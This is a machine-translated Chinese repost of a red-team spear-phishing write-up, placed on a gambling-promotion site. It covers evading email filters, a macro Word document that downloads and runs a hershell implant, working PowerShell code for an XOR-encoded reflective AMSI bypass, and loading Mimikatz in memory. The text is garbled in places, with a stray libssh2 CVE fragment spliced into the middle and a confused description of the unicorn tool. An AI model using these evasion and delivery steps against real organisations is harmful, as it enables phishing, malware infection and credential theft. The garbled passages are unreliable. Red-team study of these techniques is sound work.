红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机? | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机?

申博_新闻事件 申博 39次浏览 未收录 0个评论

申搏会员开户

你的暑假修炼法则:游戏,游戏还是游戏。别人的暑假修炼法则:游戏,收益还是收益。因为别人在使用申搏会员开户呀,这是一个来自菲律宾申博的大型娱乐网站,合法正规,各种联机电子游戏,福利好礼相送不断,金币到账快,收益高。解决你的暑假时间,就来申博开户吧,简单快捷,推荐给朋友一起试试吧!

,

红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机?

关于红队在渗入测试中运用的收集垂纶进击的文章许多,不过大多数的引见都是不完全的。在本文中,我们将对这个话题举行一次完全的梳理,包含域建立,制造收集垂纶内容,绕过垃圾邮件过滤器和电子邮件网关,生成不可检测的有用载荷以及绕过Windows庇护(比方AMSI)的注意事项。别的,我们还在这篇文章的末端整理了一份参考文献,假如你感兴趣可以参考。

出于平安缘由,渗入测试中的客户称号和相干信息已被匿名化。依据赤色团队介入的庞杂水平和持续时候,你须要权衡你在以下每一个项目上花费了若干时候和精神。

1.邮件泉源:

1.1 运用剧本从当地主机(比方你的笔记本电脑)发送邮件;

1.2 标头中的IP是不是可托;

2. 近来启用的VPS,没有发件人历史记录;

3. 发送域信用(domain reputation)和域岁数(domain age)(从域建立到运动日期之间的时候)。

4. 链接信用和域岁数;

5. 运用信用较高的发件人,比方Mailchimp或Sendgrid。经由过程这些供应商考证你的域,以便你可以向域“发件人:”发送电子邮件。

6. 婚配目的电子邮件的返回途径;

7. 设置SPF,DKIM和DMARC;

8. 时候和频次:

8.1 假如你一次从信用低下的IP发送100封电子邮件,险些可以一定会被标记为垃圾邮件。

8.2 发送域和电子邮件中的链接上的有用SSL证书;

9. 失效链接;

10. HTML内容的数目;

11. 不要进入黑名单;

详细的测试时候,取决于渗入测试的水平:

1. 假如你要克隆高信用的域来举行凭证收集垂纶,要注意提防自动扫描引擎,这一点特别主要。

1.1 Web Scraper和平安电子邮件网关(SEG)正在主动寻觅能复制Office 365和Gmail等收集垂纶网页的网站。Web Scraper是一款可以从网页中提取数据的chrome网页数据提取插件,是一款异常好用的爬虫东西。

1.2 将良性内容供应给自动化平台;

2. 你可以运用大众GreyNoise API中的WEB_CRAWLER标记找到网页爬虫列表;

3. curl -s -XPOST -d ‘tag=WEB_CRAWLER’ http://api.greynoise.io:8888/v1/query/tag;

4. 你还可以运用手艺来辨认模拟环境,如headless Chrome、Selenium等。

5. 在信用较高的域或你本身的自定义域上托管歹意附件,SEG可以更好地捕捉歹意载荷,比方带有宏的Word文档。假如你的附件被捕捉,你可以会被列入黑名单。

6. 一旦你搞砸了一次,它就很难恢复和触及用户的收件箱。你可以须要住手全部渗入运动,然后重新开始。

7. 检察有关看管你的域和基本构造的“Specter Ops”文章,以相识是不是有遭到进击的迹象。

8. 301/302重定向到信用较高的域,你的域现实上未与重定向域关联,因而可以将其归为歹意域。

收集垂纶运动的渗入测试

我们通常会以三种体式格局处置惩罚垂纶运动:

1.针对特定个人的进击运动;

2. 从侦探阶段收集到的针对一切用户的大规模进击,有许多很棒的资本可用于侦察和建立可定位的电子邮件地址列表,比方2019年的OSINT资本,The Harvester ,datasploit ,Github上的awesome-osint )

3.经由过程在目的公司网站上的表格提交信息,通常是经由过程捏造一个公司来举行;

每一个进击运动运用差别的域,以避免影响其他进击运动的信用或进击才。假如公司意想到他们是进击目的,那末你将来的尝试可以会遭到更严厉的检察。在考证我们的域并设置电子邮件身份考证后,我们常常运用Mailchimp邮件系统举行邮件发送。我们还胜利运用了G Suite帐户和运用自定义剧本的SMTP身份考证。

因为时候限定(20小时),我们只挑选了上面的第2和第3种体式格局。关于这两个进击运动,我们都运用了带有宏的word文档。

进击示例

我们对目的公司的MX举行了查询,发明他们正在运用G Suite,因而我们可以针对模拟的G Suite帐户测试进击运动,以确保我们可以经由过程他们的庇护。

对 libssh2 整数溢出破绽 (CVE-2019-17498)的剖析

0x01 漏洞挖掘 在2019年3月18日,Canonical Ltd.的Chris Coulson披露了libssh2中的九个漏洞(CVE-2019-3855至CVE-2019-3863)。这些漏洞已在libssh2 v1.8.1中修复。当时,我的同事Pavel Avgustinov注意到,修复漏洞的报告在LGTM上引入了多个新告警。这些告警是由于像下面的代码:  if((p_len = _libssh2_get_c_string(&buf, &p)) < 0) 问题出现在_libssh2_get_c_string返回 -1是一个error code,但是p_len没有符号,因此错误条件将被忽略。libssh2团队已经在后面的的报告中修复了这

dig target.com MX

Google在过滤歹意附件方面做得不错,因而在第一项运动中我们将其托管在信用较高的域中,在第二项运动中我们将其托管在我们本身的域中。

怎样生成Word文档宏和有用载荷

在示例进击中,我们运用了带有宏的歹意Word文档。我们应用unicorn生成了一个powershell宏来下载/实行我们的有用载荷,并做了一个细微的修改来绕过防备:

"po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "

注:Unicorn 是一款异常优异的跨平台模拟实行框架,该框架可以跨平台实行Arm, Arm64 (Armv8), M68K, Mips, Sparc, & X86 (include X86_64)等指令集的原生顺序。

Unicorn 不仅仅是模拟器,更是一种“硬件级”调试器,运用Unicorn的API可以轻松掌握CPU寄存器、内存等资本,调试或挪用目的二进制代码,现有的反调试手腕对Unicorn 险些是无效的。

我们运用hershell作为有用载荷,这是一个用Go编写的精彩的轻量级阶段 1,当时没法检测到其x86拱门。假如你的有用载荷被标记,你可以挑选殽杂和加密,假如你晓得你的目的环境,也可以运用dsplit手动绕过平安防备署名。你可以参考一些资本:

https://resources.infosecinstitute.com/antivirus-evasion-tools/

https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1

http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html

Metasploit 5 近来也宣布了内置的有用载荷加密和回避的有用载荷,然则我们还没有时机运用它们。Metasploit是一款开源的平安破绽检测东西,可以协助平安和IT专业人士辨认平安性问题,考证破绽的减缓步伐,并治理专家驱动的平安性举行评价,供应真正的平安风险谍报。这些功用包含智能开辟,代码审计,Web应用顺序扫描,社会工程。

绕过AMSI

我们估计须要运转自定义的Powershell有用载荷,因而我们不能不绕过近来的Windows庇护,称为AMSI。依据Microsoft的说法,AMSI代表了杀毒软件的扫描接口,并许可顺序(如Powershell)在实行之前向扫描引擎提交内容。谢谢Cyberark举行绕过AMSI的开端研讨,并撰写了Andre Marques的文章。我们可以调解它们的完成,这些完成当时已被Microsoft标记出来,以运用XOR加密绕过AMSI。

1. Re-compile the AMSI Bypass DLL
2. Convert the binary to base64
    $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$pwd\\bypass.dll"))
3. XOR encrypt
    foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 }
4. Print encrypted buf as a byte array
    foreach($byte in $encrypted){ Write-Host -nonewline "$byte," }

On Target

1. Split encrypted buf due to powershell line limit lengths
2. Concat the buf
    $xorencrypted = $a + $b + $c + $d + $e + $f + $g
3. Decrypt the buf 
    foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 }
4. Get buf as base64
    $base64string = [Text.Encoding]::UTF8.GetString($decrypted)
5. Load the DLL using reflection
    function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }
6. Call the bypass method
    Bypass-AMCEE

这许可我们在内存中再次实行powershell有用载荷,比方Mimikatz。

你可以在此处猎取有用的AMSI绕过源码。

进击示例1:捏造公司,有针对性地提交表格文件

在目的网站上找到表单提交页面以举行新营业查询后,我们建立了一个假的公司和域名以婚配其营业范围。在屡次尝试运用Dropbox和其他文件托管效劳来承载我们的有用载荷失利以后,我们运用了mixmax.com,该网站还可以方便地跟踪翻开和点击。

发送给贩卖代表的电子邮件:

红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机?

带有宏的歹意Word文档,好像须要启用宏才准确加载:

红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机?

启用后,宏将下载并实行我们的Hershell植入。

进击示例2:无针对性地进击

因为进击运动是在新年前后举行的,因而我们就以此为假装接口。我们模拟了一个受欢迎的员工嘉奖设计:appendhub.com。假如你接见了我们的网站,我们会经由过程重定向到octanner.com来模拟实在网站的行动。假如你长期运用该域,这现实上会损伤你的域信用,因而你最好克隆一个网站。

电子贺卡上详细标清楚明了每一个员工的姓名:

红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机?

我们在word文档中嵌入了一个视频文件,这好像须要宏来播放。我们运用nginx规则将歹意载荷托管在我们本身的域中,以直接下载并举行跟踪:

红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机?

Nginx指令:

  location /receivedECard {
    alias /var/www/html/HappyNewYear2019.docm;
    add_header Content-Disposition 'attachment; filename="Happy New Year 2019.docm"';
  }

初始接见:

红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机?

对应的缓解步伐

禁用宏

关于这类特定的进击载体来讲,这是迄今为止最简朴的要领,然则关于一些依赖于它们的构造来讲,这是不可以的。

不要接收不受信托/未经检察的泉源的附件

假如必需,可以在虚拟环境中翻开附件。

用户的平安意识培训

举行通例的模拟收集垂纶进击培训,这可以会下降进击运动的有用性。

总结

从进击者的角度来看,收集垂纶已变得比几年前更具挑战性,但它依然是异常可行的,在短时候内依然就有进击代价。前期进击时,大部分的时候都花在了有用载荷的建立上,然则一旦进击者有了可用的东西集,建立新的进击就变得异常简朴和疾速,而应对构造则须要响应地调解应对战略。

本文翻译自:https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明红队渗入测试手艺:怎样经由过程鱼叉式收集垂纶取得进击时机?
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址